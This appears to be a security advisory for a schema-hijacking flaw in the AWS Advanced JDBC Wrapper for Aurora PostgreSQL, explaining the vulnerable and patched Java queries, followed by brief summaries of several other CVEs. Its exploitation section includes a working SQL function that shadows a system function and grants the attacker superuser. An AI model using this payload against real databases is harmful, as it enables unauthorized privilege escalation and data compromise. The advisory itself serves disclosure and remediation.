Jul 18, 2026·6 min read·1 visit
A schema-hijacking vulnerability in the AWS Advanced JDBC Wrapper for Aurora PostgreSQL allows authenticated low-privilege users to execute code as rds_superuser when an administrator connects using the affected library, caused by a failure to qualify system function queries.
An untrusted search path vulnerability in the GlobalDatabasePlugin component of the AWS Advanced JDBC Wrapper for Amazon Aurora PostgreSQL allows authenticated, low-privilege database users to hijack administrative session queries. By defining a custom function in a writable schema such as the public schema, an attacker can hijack queries executed automatically during driver-level topology detection. When a highly privileged database user connects to the database utilizing an affected version of the wrapper, the custom function executes under their security context, enabling remote privilege escalation to rds_superuser.
The AWS Advanced JDBC Wrapper for Amazon Aurora PostgreSQL provides enhanced database features, including high-availability failover tracking, read/write splitting, and topology discovery. To support these capabilities, the wrapper utilizes plugins like GlobalDatabasePlugin to inspect the cluster's topology. The driver executes periodic, background queries against system metadata tables and specialized functions to verify whether the target node is a writer or reader instance.
These automated background checks are executed inside the active database session of the client application. Consequently, if a highly privileged user, such as an administrator or service account with the rds_superuser role, initiates a connection, the wrapper's background queries execute with those same elevated capabilities.
The vulnerability is classified under CWE-426 (Untrusted Search Path / Schema Hijacking). Because the internal queries executed by the wrapper fail to explicitly specify the schema namespace, PostgreSQL resolves system function calls dynamically by scanning the schemas listed in the active session's search_path. This behavior presents an attack surface where lower-privileged database users with schema-write capabilities can intercept administrative execution flows.
The fundamental flaw resides within the PostgreSQL identifier resolution process combined with unqualified query generation in software.amazon.jdbc.dialect.GlobalAuroraPgDialect.
When executing queries, PostgreSQL relies on the search_path configuration parameter to resolve names of tables, views, and functions that are not explicitly prefixed by a schema. By default, the search_path parameter is set to "$user", public. In a default configuration, any user has write (CREATE) access to the public schema, allowing low-privileged database accounts to define custom functions within it.
Prior to version 4.0.1, the driver executed topology detection queries such as SELECT SERVER_ID, CASE WHEN SESSION_ID = 'MASTER_SESSION_ID' THEN TRUE ELSE FALSE END, VISIBILITY_LAG_IN_MSEC, AWS_REGION FROM aurora_global_db_instance_status(). Because the query refers to aurora_global_db_instance_status() without a schema prefix (such as pg_catalog.), PostgreSQL traverses the search_path. It looks for the function in the current user's schema first, then in the public schema, and only checks the system-level catalog (pg_catalog) if it is not found elsewhere. An attacker can construct a malicious function of the same name and signature in the public schema to override the legitimate system function.
The vulnerability is exposed in GlobalAuroraPgDialect.java. A comparative analysis of the code-level modifications implemented in the patch shows the remediation strategy.
Before the fix, the queries were defined with unqualified function calls as shown below:
// Vulnerable Code Path
public class GlobalAuroraPgDialect extends AuroraPgDialect implements GlobalAuroraTopologyDialect {
protected static final String GLOBAL_STATUS_FUNC_EXISTS_QUERY =
"select 'aurora_global_db_status'::regproc";
protected static final String GLOBAL_INSTANCE_STATUS_FUNC_EXISTS_QUERY =
"select 'aurora_global_db_instance_status'::regproc";
protected static final String GLOBAL_TOPOLOGY_QUERY =
"SELECT SERVER_ID, CASE WHEN SESSION_ID = 'MASTER_SESSION_ID' THEN TRUE ELSE FALSE END, "
+ "VISIBILITY_LAG_IN_MSEC, AWS_REGION "
+ "FROM aurora_global_db_instance_status()";
protected static final String REGION_COUNT_QUERY =
"SELECT count(1) FROM aurora_global_db_status()";
protected static final String REGION_BY_INSTANCE_ID_QUERY =
"SELECT AWS_REGION FROM aurora_global_db_instance_status() WHERE SERVER_ID = ?";
}The patch in commit 01be7ea47b13cd98754fff459ba95a97191cbd41 resolves the vulnerability by prepending the safe system catalog namespace pg_catalog. to all target functions:
// Patched Code Path
public class GlobalAuroraPgDialect extends AuroraPgDialect implements GlobalAuroraTopologyDialect {
protected static final String GLOBAL_STATUS_FUNC_EXISTS_QUERY =
"select 'pg_catalog.aurora_global_db_status'::regproc";
protected static final String GLOBAL_INSTANCE_STATUS_FUNC_EXISTS_QUERY =
"select 'pg_catalog.aurora_global_db_instance_status'::regproc";
protected static final String GLOBAL_TOPOLOGY_QUERY =
"SELECT SERVER_ID, CASE WHEN SESSION_ID = 'MASTER_SESSION_ID' THEN TRUE ELSE FALSE END, "
+ "VISIBILITY_LAG_IN_MSEC, AWS_REGION "
+ "FROM pg_catalog.aurora_global_db_instance_status()";
protected static final String REGION_COUNT_QUERY =
"SELECT count(1) FROM pg_catalog.aurora_global_db_status()";
protected static final String REGION_BY_INSTANCE_ID_QUERY =
"SELECT AWS_REGION FROM pg_catalog.aurora_global_db_instance_status() WHERE SERVER_ID = ?";
}By forcing the pg_catalog namespace prefix, PostgreSQL's parser bypasses user-writable schemas completely during symbol resolution. This stops standard users from shadowing system functions.
To exploit this vulnerability, an attacker must have access to a database account with permissions to connect and write to a schema in the default search path (typically public). No administrative permissions are required initially.
The attacker creates a custom table-returning function that matches the identifier and signature used by the target dialect topology check. This malicious function executes payload queries and returns structure-compliant placeholder records to avoid triggering client-side application exceptions.
-- Step 1: Create a malicious function matching the expected topology signature
CREATE OR REPLACE FUNCTION public.aurora_global_db_instance_status()
RETURNS TABLE (
SERVER_ID text,
SESSION_ID text,
VISIBILITY_LAG_IN_MSEC integer,
AWS_REGION text
) AS $$
BEGIN
-- Step 2: Payload executing administrative operations under victim context
EXECUTE 'ALTER ROLE low_priv_attacker WITH SUPERUSER;';
-- Step 3: Return mock values to allow driver flow to complete gracefully
RETURN QUERY SELECT 'primary-node'::text, 'MASTER_SESSION_ID'::text, 0::integer, 'us-east-1'::text;
END;
$$ LANGUAGE plpgsql SECURITY DEFINER;Once the function is registered, the attacker waits for a user with administrative privileges to connect to the database through an application using the affected JDBC wrapper. Upon connection, the wrapper issues the background topology query. PostgreSQL evaluates the search path, resolves aurora_global_db_instance_status to public.aurora_global_db_instance_status(), executes the payload under the administrator's context, and promotes the attacker's account to a superuser role.
The successful exploitation of CVE-2026-11400 results in complete database compromise. Because the driver queries run inside the security context of the user establishing the active database connection, any administrative operations contained within the attacker's function run with the credentials of that connected user.
If the victim is an administrative service or possesses the rds_superuser role, the attacker achieves full administrative control over the PostgreSQL database instance. This administrative access allows attackers to bypass security boundaries, read, alter, or delete sensitive tables, access stored credentials, and compromise downstream database client sessions.
This vulnerability is characterized by a low attack complexity. However, it requires user interaction, as a privileged user must initiate a database connection via the vulnerable wrapper to trigger the payload execution. The CVSS score is evaluated as 8.0 (High), reflecting a high impact on database confidentiality, integrity, and availability.
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H| Product | Affected Versions | Fixed Version |
|---|---|---|
AWS Advanced JDBC Wrapper for Amazon Aurora PostgreSQL Amazon Web Services | >= 3.0.0, < 4.0.1 | 4.0.1 |
| Attribute | Detail |
|---|---|
| CWE ID | CWE-426 |
| Attack Vector | Network |
| CVSS v3.1 Score | 8.0 |
| EPSS Score | 0.00305 |
| Exploit Status | poc |
| CISA KEV Status | No |
The product uses an untrusted search path that contains namespaces, directories, or libraries that are outside of the product's direct control, which can allow malicious code to run.
A stored Cross-Site Scripting (XSS) vulnerability exists within plone.restapi, the REST API package for Plone content management system. By supplying a spoofed input MIME type (text/x-html-safe), an attacker can mislead the rendering layer (plone.app.textfield) into assuming that the supplied content is already sanitized. This causes the system to skip the safe_html transform, allowing arbitrary JavaScript to execute in the victim's browser when they view the compromised page.
CVE-2026-27771 represents a critical security flaw in Gitea and Forgejo (up to and including version 1.26.1) involving missing authorization checks (CWE-862). Unauthenticated remote attackers can query, enumerate, and download private container images from the OCI-compliant container registry. Additionally, unauthorized users can retrieve private or internal source repository URLs via the Composer package registry metadata API. A public proof-of-concept exists, and threat metrics indicate highly active scanning and exploitation risks.
A missing authorization vulnerability in the Formie plugin for Craft CMS prior to version 3.1.28 allows low-privileged Control Panel users to read and modify sensitive administrative settings, configuration options, and third-party integrations.
CVE-2026-53598 is a directory traversal and arbitrary file read vulnerability in Microsoft Prompty ecosystem loaders across multiple languages. Prior to version 2.0.0-beta.2, the loaders resolved `${file:...}` reference strings inside frontmatter configuration blocks without enforcing that the target file paths resided within authorized directories. This deficiency allows an attacker-controlled configuration file to read sensitive operating system and application files through absolute paths, directory traversal, or symbolic link escapes. The issue is addressed across the Python, C#, Node.js/TypeScript, and Rust ecosystems.
A directory traversal vulnerability exists in the copy subcommand of the proot-distro utility. Due to incomplete path sanitization, local attackers or malicious scripts can read from or write to arbitrary files outside the container rootfs, bypassing isolation barriers and potentially gaining unauthorized access or persistent execution on the host system.
An authorization bypass vulnerability in the Open Policy Agent (OPA) integration of the Skipper HTTP router allows unauthenticated remote attackers to bypass OPA policy inspection. When an incoming HTTP request declares a Content-Length exceeding Skipper's configured maxBodyBytes limit, Skipper bypasses body parsing and forwards an empty document to OPA, while transmitting the full, uninspected payload intact to the upstream backend.